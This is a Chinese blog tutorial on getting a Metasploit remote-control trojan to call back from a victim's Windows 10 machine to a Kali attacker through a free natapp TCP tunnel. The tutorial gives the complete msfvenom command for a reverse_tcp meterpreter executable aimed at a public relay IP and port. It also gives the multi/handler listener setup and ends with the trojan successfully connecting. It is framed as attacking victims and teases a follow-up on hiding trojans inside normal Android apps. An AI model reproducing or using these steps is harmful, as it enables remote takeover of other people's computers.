[超简单]MSF远控内网穿透教程natapp

木马进入受害者机器后处于公网环境,想要成功连接kali,必须通过代理服务器进行转发实现内网穿透,我们可以通过免费的内网穿透工具natapp来实现,这里以windows木马为例,安卓等的远控木马同理

实验环境:

受害者机器:win10

攻击机:kali

一、搭建natapp代理隧道

NATAPP-内网穿透 基于ngrok的国内高速内网映射工具

1、购买免费TCP隧道

首先访问官网进行注册,实名之后就能免费搭建一条tcp隧道

 选择免费隧道进行购买

 选择TCP协议,端口我们填写kali本地监听的端口46886(我没有用图中的5566端口),也可以先不填写,过会儿启动监听时确定了监听端口再修改也可以

然后我们购买就得到了一条免费的TCP隧道

2、配置TCP隧道

我们点击客户端下载,将natapp工具的linux版本下载到kali中

 我们找到进入我的隧道,复制下我们的token

在kali中执行,进行连接

./natapp -authtoken=你的token

 

 

执行后出现这个界面就已经搭建成功了!

二、生成远控木马

接下来我们生成远控木马,需要注意的是,反弹的ip不再是本地的127.0.0.1或者局域网内的192.168.xxx.xxx,端口也不是kali本地的监听端口,而是代理服务器的ip和随机给出的端口(如上图中的50297),代理服务器的ip我们直接ping一下服务器的地址就能获得了

  msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows -o ./muma.exe LHOST=114.215.255.18 LPORT=50297

注意,木马反弹的ip和端口都已经换成代理服务器的而不是kali本地的了! 

接下来我们配置kali监听:

 msfconsole -q   # 开启msf

use exploit/multi/handler

show options

set lhost 127.0.0.1

set lport 46886

set payload windows/meterpreter/reverse_tcp   # 设置payload

run   # 启动监听

 

接下来我们在win10靶机里运行我们刚刚生成的木马:

 木马成功上线!

三、总结

内网穿透的原理很简单,就是通过代理服务器进行转发,要注意的是生成木马的端口要填写代理服务器的ip和端口,本地kali的监听就填写本地ip(127.0.0.1)和本地端口,本地端口要和代理隧道配置时转发的端口相同才行

下一期我们讲解msf生成安卓木马手动捆绑到正常的安卓软件中进行渗透,喜欢我的文章记得点赞收藏关注哦

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值